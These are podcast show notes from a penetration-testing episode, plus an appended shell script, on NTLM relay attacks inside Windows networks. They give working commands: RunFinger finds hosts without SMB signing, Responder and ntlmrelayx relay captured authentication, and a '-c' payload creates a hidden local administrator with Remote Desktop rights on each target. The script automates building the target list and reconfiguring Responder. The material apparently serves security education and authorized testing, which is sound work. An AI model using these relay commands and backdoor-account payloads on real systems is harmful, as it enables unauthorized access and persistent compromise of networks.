7MS #372: Tales of Internal Pentest Pwnage - Part 5 - a podcast by Brian Johnson
from 2019-07-15T22:51:08
Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://pro.tv/7minute
Today I share the (hopefully) exciting and fun conclusion to last week's episode about a tale of internal pentest pwnage! A few important notes from today's episode:
- Need to find which hosts on your network have SMB signing disabled, and then get a nice clean list of IPs as a result? Try this:
/opt/responder/tools/RunFinger.py -i THE.SUBNET.YOU-ARE.ATTACKING/24 -g > hosts.txt
grep "Signing:'False'" hosts.txt | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' > targets.txt
The -g flag gives RunFinger's grep-friendly one-line-per-host output, which is what the second command filters on.
Source: Pwning internal networks automagically
- Ready to relay captured NTLM authentication from one host to another? Open responder.conf and turn SMB and HTTP to Off (so ntlmrelayx, not Responder, answers on those ports), then get Responder running in one window and ntlmrelayx in another. Specifically, I like to use
ntlmrelayx.py -tf targets.txt
where targets.txt is the list of machines you found that are not using SMB signing. I also like to add a -c to run a command of my choice. Check out this fun evil little nugget:
net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add
So the full command would be:
ntlmrelayx.py -tf targets.txt -c 'net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add'
Two things to keep in mind: the -c command only executes when the account whose authentication you relayed is a local administrator on the target, and a connection cannot be relayed back to the same host it came from, so the victim and the target in targets.txt must be different machines.
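The two steps above (building targets.txt from RunFinger output, then switching the SMB and HTTP servers off in responder.conf before starting ntlmrelayx), strung together as an added example. This is not code from the episode, from Responder or from impacket. It assumes the grep-format output that RunFinger.py -g printed at the time (one bracketed line per host carrying a Signing:'True' or Signing:'False' field) and the "Name = On" server lines of Responder's conf file; the RunFinger output and conf excerpt embedded below are constructed samples so the script runs offline.

```shell
#!/bin/sh
# Added example, not from the 7MS episode or the Responder/impacket projects.
# Glues the two show-note steps together as reusable functions and exercises
# them on constructed sample data.

# Constructed sample of RunFinger.py -g output (assumed format: one bracketed
# line per host). Only the Signing field matters for picking relay targets.
SAMPLE_RUNFINGER="['10.0.0.5', Os:'Windows 7/Server 2008R2', Domain:'CORP', Bootime: 'Unknown', Signing:'False', rdp:'True', SMB1:'True', MSSQL:'False']
['10.0.0.6', Os:'Windows Server 2016', Domain:'CORP', Bootime: 'Unknown', Signing:'True', rdp:'True', SMB1:'False', MSSQL:'False']
['10.0.0.17', Os:'Windows 10', Domain:'CORP', Bootime: 'Unknown', Signing:'False', rdp:'False', SMB1:'False', MSSQL:'False']"

# Constructed excerpt of the [Responder Core] section of responder.conf.
SAMPLE_CONF="[Responder Core]

; Servers to start
SQL = On
SMB = On
RDP = On
HTTP = On
HTTPS = On
DNS = On"

# relay_targets: read RunFinger grep output on stdin, print one IP per line for
# every host that reports SMB signing as not enforced. Same filter as the show
# notes, but the IP is taken only from the leading quoted field so a dotted
# version string inside the OS field can never be mistaken for a target.
relay_targets() {
    grep "Signing:'False'" | sed -n "s/^\['\([0-9.]*\)'.*/\1/p"
}

# disable_servers: read responder.conf on stdin and flip the servers named as
# arguments (e.g. SMB HTTP) from On to Off, leaving everything else untouched.
# HTTPS stays On when only HTTP is named because the whole key is compared.
disable_servers() {
    awk -v names="$*" '
        BEGIN { n = split(names, want, " "); for (i = 1; i <= n; i++) off[want[i]] = 1 }
        /^[A-Za-z]+[ \t]*=[ \t]*On[ \t]*$/ {
            key = $0
            sub(/[ \t]*=.*$/, "", key)
            if (key in off) { print key " = Off"; next }
        }
        { print }
    '
}

# Demonstration on the constructed data. On a real engagement the first printf
# would be replaced by RunFinger.py -i <subnet>/24 -g and the second by
# Responder's actual conf file, redirecting the results to targets.txt and back
# into responder.conf respectively.
echo "== hosts without SMB signing (targets.txt) =="
printf '%s\n' "$SAMPLE_RUNFINGER" | relay_targets

echo "== responder.conf after turning SMB and HTTP off =="
printf '%s\n' "$SAMPLE_CONF" | disable_servers SMB HTTP

echo "== command to run in the second window =="
echo "ntlmrelayx.py -tf targets.txt -c '<command of your choice>'"
```

Run it as-is to see the filtered target list and the edited conf excerpt; with live data, pipe RunFinger's output into relay_targets and the real conf file through disable_servers, then start Responder in one window and the printed ntlmrelayx command in the other.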
Check today's show notes at https://7ms.us for more information!